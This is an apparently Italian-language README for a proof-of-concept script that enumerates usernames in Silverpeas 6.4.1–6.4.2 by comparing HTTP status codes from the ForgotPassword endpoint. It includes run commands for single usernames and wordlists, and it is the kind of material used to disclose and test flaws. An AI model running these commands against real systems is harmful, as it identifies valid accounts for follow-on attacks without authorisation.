
PoC per Silverpeas <= 6.4.2 Enumerazione degli username
Script Proof-of-Concept per dimostrare una vulnerabilità di enumerazione degli username in Silverpeas versioni 6.4.1 e 6.4.2.
Riassunto: La vulnerabilità risiede nella funzionalità di recupero password (endpoint /silverpeas/CredentialsServlet/ForgotPassword). Inviando richieste POST con potenziali username nel parametro Login, il server risponde con diversi codici di stato HTTP (200 OK per utenti validi, 302 Found per utenti non validi). Questa discrepanza consente a un attaccante remoto non autenticato di determinare username validi sul sistema.
silverpeas_enum_poc.pyrequests (pip install requests)Clonare il repository o scaricare lo script (silverpeas_enum_poc.py).
Installare le dipendenze: pip install requests
Eseguire lo script dal terminale:
Testare un singolo username:
python silverpeas_enum_poc.py <TARGET_URL> -u <USERNAME>
Esempio: python silverpeas_enum_poc.py http://vulnerable-silverpeas.local -u admin
Testare username da un file:
python silverpeas_enum_poc.py <TARGET_URL> -w <WORDLIST_FILE>
Esempio: python silverpeas_enum_poc.py https://vulnerable-silverpeas.com -w users.txt
Lo script restituirà:
[+] Username '...' appare VALIDO (Stato: 200) per username corrispondenti probabilmente ad account esistenti.[-] Username '...' appare NON VALIDO (Stato: 302) per username probabilmente non corrispondenti ad account esistenti.Questo script è fornito a scopo educativo e per dimostrare la vulnerabilità. Utilizzare questo script in modo responsabile e solo contro sistemi per i quali si dispone di autorizzazione scritta esplicita. La scansione o il test non autorizzato è illegale e non etico. L'autore non si assume alcuna responsabilità e non è responsabile per eventuali usi impropri o danni causati da questo script.